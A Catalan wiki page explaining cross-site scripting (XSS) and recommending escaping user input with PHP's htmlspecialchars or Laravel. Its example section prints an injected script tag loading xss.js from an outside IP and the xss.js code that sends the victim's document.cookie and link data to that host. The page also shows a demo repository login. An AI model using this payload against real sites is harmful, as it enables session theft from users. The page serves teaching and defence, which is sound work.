IMPORTANT: Per accedir als fitxer de subversion: http://acacha.org/svn (sense password). Poc a poc s'aniran migrant els enllaços. Encara però funciona el subversion de la farga però no se sap fins quan... (usuari: prova i la paraula de pas 123456)

CSS Atack

Introducció

Aka XSS Cross Site Scripting per diferenciar de CSS.

Cal escapar qualsevol dada que provingui dels usuaris (per exemple dades passades per formulari amb variables POST o url query amb variables GET). La clau és utilitzar la funció: 

htmlspecialchars

de PHP o utilitzar frameworks com Laravel que per defecte realitzen aquestes tasques al treballar amb les dades d'input ja siguin POST o GET.

Vegeu http://www.easylaravelbook.com/blog/2015/07/22/how-laravel-5-prevents-sql-injection-cross-site-request-forgery-and-cross-site-scripting/

Exemple amb cookies

Imatge passada com a entrada camp formulari no escapat per no executar codi HTML: 

<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"

Script xss.js 

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Resources

Vegeu també

Enllaços externs

Obtingut de «http://acacha.org/w/index.php?title=CSS_Atack&oldid=229014»

Sobre nosaltres

logo

Acacha Wiki és un lloc web col·laboratiu d' informàtica i telecomunicacions creat per experts en administració de sistemes, xarxes, desenvolupament multiplataforma, disseny web i altres àrees de coneixement.

Quant a Política de privadesa Avís general

Blog

TODO
Entrada blog 1
October 9, 2014
pendent
Entrada blog 2
October 9, 2014

Pàgines populars

Segueix-nos




Pàgines Germanes

Ebre-escool

S'ha visitat aquesta pàgina 1624 vegades.
Darrera modificació de la pàgina: 15 oct 2016 a les 21:12.
© 2022 by Sergi Tur Badenas i altres contribuïdors • Powered by MediaWiki & Bootstrap